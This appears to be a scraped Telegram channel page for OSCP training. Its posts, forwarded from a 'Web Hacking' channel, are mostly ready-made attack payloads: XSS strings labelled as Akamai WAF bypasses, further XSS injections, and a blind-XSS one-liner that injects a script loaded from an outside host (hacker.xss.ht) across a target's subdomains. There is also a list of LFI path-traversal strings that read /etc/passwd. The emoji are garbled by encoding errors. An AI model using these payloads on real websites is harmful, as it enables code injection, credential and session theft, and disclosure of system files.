πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
8.1K subscribers
162 photos
1 video
27 files
64 links
Offensive Security Certified Professional
@WebHacking
@pfsense
@WifiHacking
πŸ”°For safer days
Download Telegram
Forwarded from Web Hacking
Akamai WAF bypass

<A href="javascrip%09t&colon;eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
πŸ”₯3πŸ‘2❀1
Forwarded from Web Hacking
A nice way to store the payload

"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>
πŸ‘6
Forwarded from Web Hacking
A payload to bypass Akamai WAF

<A href="javascrip%09t&colon;eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
πŸ‘7
Forwarded from Web Hacking
Another one


"><img/src/style=html:url("data:,"><svg/onload=confirm(69)>")>
πŸ‘3πŸ€”2
Testing Authentication Flaws in Web Application
πŸ‘2❀1
One Liner To Find Blind XSS
Blind XSS in Parameters

subfinder -d target.com | gau | grep "&" | bxss -appendMode -payload '"><script src=hacker.xss.ht></script>' -parameters
πŸ‘4
Pentesting Webapp Checklist for Small scope !
πŸ”₯8
Use this payloads on Email field...
πŸ‘1
Bug Bounty Tips

Sensitive Data Exposure
in ASPβ€’NET apps via /Trace.axd endpoint
πŸ‘5
Upload functionality testing
πŸ‘6πŸ‘2
Some filter bypass payload list while hunting for LFi vulnerability


β†’index.php?page=....//....//etc/passwd
β†’index.php?page=..///////..////..//////etc/passwd
β†’index.php?page=/var/www/../../etc/passwd
πŸ‘9πŸŽ‰1